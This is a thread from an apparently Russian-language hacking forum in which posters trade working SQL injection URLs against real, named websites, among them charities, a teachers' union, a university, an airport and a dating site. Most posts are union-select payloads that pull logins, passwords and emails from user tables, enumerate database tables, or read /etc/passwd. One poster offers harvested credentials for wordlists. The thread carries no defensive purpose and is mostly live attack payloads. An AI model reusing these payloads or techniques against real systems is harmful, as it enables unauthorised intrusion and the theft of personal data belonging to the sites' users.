SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. kamaz

    Here you go :)
     
    1 person likes this.
  2. }{0TT@БЬ)Ч

    IMHO, use order by first, since it cuts down the guessing time, but it doesn't work everywhere.

    http://bestposters.ru/main.php?big=-1262+union+select+1,concat(login,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users+limit+1,1/*
    about 20 users, ugh, yuck, not even interesting :D
     
    #522 }{0TT@БЬ)Ч, 16 Feb 2007
    Last edited: 16 Feb 2007
  3. Thanat0z

    Today wasn't a very successful day for me in terms of the number of SQL injections, but it was very instructive in terms of errors. Here are some SQL injections with errors that I haven't run into before and that are, one way or another, a dead end, or at least I couldn't get anything out of them.

    Code:
    __http://www.revolution.co.uk/_forum.php?neuron=3+order+by+14/*
    __http://www.laptopshowcase.co.uk/downloads.php?id=1+group+by+11/*
    __http://www.immunisation.org.uk/article.php?id=-97'+union+select+1,2,3,4,5,6,7,8/*
    and whoever solves this puzzle gets +6 from me
    Code:
    __http://www.prospect-magazine.co.uk/article_details.php?id=7320')+union+select+1111,2222,3333,4444,555,666/*

    and only one successful one

    Code:
    __http://www.publicwhip.org.uk/policy.php?id=-230+union+select+1,user,3,4,5,6,7/*
    
    I couldn't guess the table; this is what I tried...
    __http://www.publicwhip.org.uk/policy.php?id=-230+union+select+1,user_name,3,4,5,6,7+from+pw_dyn.user/*
     
  4. c411k

    Thanat0z, read more
    Code:
    http://www.revolution.co.uk/_forum.php?topic=3766&message=446388+union+select+1,2,3,4,convert(version()+using+latin1),6,7,8,9&neuron=3&page=0
    http://www.immunisation.org.uk/article.php?id=997'+union+select+1,2,user(),version(),5,6,7,8,9/*
    http://www.prospect-magazine.co.uk/list.php?subject=48+union+select+1,2,3,version(),5,6,7,8,9,0,user(),2,3/*
     
    1 person likes this.
  5. Thanat0z

    heh :) maybe something can be pulled from these, but the ones I posted were completely different :) You're still cool, though :)
     
  6. n0ne

    Thanat0z,c411k,
    Code:
    http://www.prospect-magazine.co.uk/list.php?subject=48+union+select+1,2,3,concat(email,0x3a,password),5,6,7,8,9,0,1,2,3+from+customers/*
    email=login
    :D
     
    1 person likes this.
  7. злюка

    _http://www.bushtorrent.com/pic.php?id=-99+union+select+1,0x6869206d616e20212121,3,4,5,6+from+mysql.user/*

    heh, I couldn't guess the table names, but I did get the host name))... there's a vBulletin attached here.. what is the users table called in vBulletin?

    dating site, 300 users
    _http://www.datenlove.com/pic.php?id=-99+union+select+concat(name,0x3a,password,0x3a,email),2+from+users+limit+300,1/*

    _http://www.112uh.com/image.php?id=-99+union+select+1,2,concat(username,0x3a,password,0x3a,email),4+from+eftersnack_users/*
    _http://www.112uh.com/image.php?id=-99+union+select+1,2,concat(user,0x3a,pass),4+from+bf_users/*

    but the admin panel can only be accessed from a specific IP
     
    #527 злюка, 16 Feb 2007
    Last edited: 16 Feb 2007
    1 person likes this.
  8. }{0TT@БЬ)Ч

    злюка, keep iterating
    http://www.bushtorrent.com/pic.php?id=-99+union+select+1,concat(username,char(58),passwd),3,4,5,6+from+users+limit+1,1/*


    my favorite watches http://www.orient-time.ru/trade/news.php?nid=-25+union+select+1,2,database(),user(),version()/* ;)
     
    #528 }{0TT@БЬ)Ч, 16 Feb 2007
    Last edited: 16 Feb 2007
    1 person likes this.
  9. ice1k

    Code:
    http://www.nix.ru/news/pnv.html?id=-99+union+select+table_name,2,3,4,5+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*
    
    =\
     
  10. pop_korn

    http://www.nintek.com.au/x/Scripts/nin_support_faq.asp?cate=-1+UNION+ALL+SELECT+1,table_name+from+information_schema.tables--
     
    1 person likes this.
  11. Thanat0z

    Code:
    __http://www.franinfo.co.uk/exhi_detail.php?id=-18'+union+select+1,user(),3,4,5,6,7,8,9/*&exhibitionId=54
    __http://www.teachers.org.uk/topichome.php?id=-143'+union+select+1,convert(version()+using+latin1),333,444,555,6,7,8,9/*
     
  12. *D1VER

    http://www.rosmarket.ru/index.php?r_id=-1+union+select+user()/*

    http://www.aldenvet.kiev.ua/news/viewnews.php?kley=-1+union+select+1,database(),version(),user(),5,6,7/*

    Damn, http://vrn.kips.ru/
     
    #532 *D1VER, 17 Feb 2007
    Last edited: 17 Feb 2007
  13. kamaz

    Code:
    http://ccrc.tc.columbia.edu/Publication.asp?UID=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('ContentItem','ContentItem_Person','Archive','Archive_Pass','ArchiveColumn','ArchiveColumn_ValidationScheme',%20'Area','Category','Category_Client','Category_Record','CCRCRole','Client_Category','Conference','ContentGroup','ContentItem_ContentItemDesc','ContentItemDesc','ContentItemType','cw_Client','cw_Client_Card','cw_client_newsletter','cw_client_newsletter_old','cw_Client_Pass','cw_Client_RecordPass','cw_CreditTrans','cw_NewslettersSent','cw_Pass','cw_RecordRelate','cw_Session','DiscussionPost','DiscussionTopic','DiscussionTopic_Record','dtproperties','EditionList','Event','Fact','Import','Link','Main','NB_Commander_Tmp',%20'NewsletterFormat','OrgType','Person','PluginRecord','Presentation','Presentation_Conference','Presentation_ContentItem','Presentation_Person','Record_Pass','RecordSecurity','ResearchProject',%20'ResearchProject_Person','Search','Seminar','Seminar_ContentItem','Seminar_Person','sysconstraints','syssegments','ValidationScheme'))--
     
    3 people like this.
  14. *D1VER

    http://www.caduser.ru/acad/index.php?ver_id=-1+union+select+1,load_file('/etc/passwd'),3,4+from+mysql.user/*
     
    1 person likes this.
  15. pop_korn

    _http://www.latek.com.ua/index.php?page=produkt.php&subcat=-51+UNION+SELECT+1,2,3,pas,5,log,7,8+from+user/*
     
    1 person likes this.
  16. Spyder

    5.0.21-max =\
     
    1 person likes this.
  17. kamaz

    Let's go through the forums

    If you don't set a limit on the users there, it returns an error

    On average, each site has 1500 users. :)
     
    2 people like this.
  18. злюка

    Cologne Bonn Airport

    _http://www.cgn.de/main.php?lang=2&id=45+union+select+1,2,3,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),5,6,database(),8,9,0,1,2,3,user(),5,6,7/*
     
    1 person likes this.
  19. Thanat0z

    Code:
    __http://www.ihrc.org.uk/show.php?id=-1657+union+select+1,2,user(),database(),version(),6,7,8,9,10,11,12,13/*
    couldn't get any output from these

    Code:
    __http://www.fairelections.us/article.php?id=-67+union+select+1,2,3,4,5/*
    __http://www.elkhart.k12.in.us/content.php?id=157+union+select+1,2,3,4,555/*
     
    #539 Thanat0z, 19 Feb 2007
    Last edited: 19 Feb 2007
    1 person likes this.
  20. Thanat0z

    P.S. later I'll extract the email addresses and logins for wordlists; whoever needs them, PM me
     
    #540 Thanat0z, 19 Feb 2007
    Last edited: 19 Feb 2007
    3 people like this.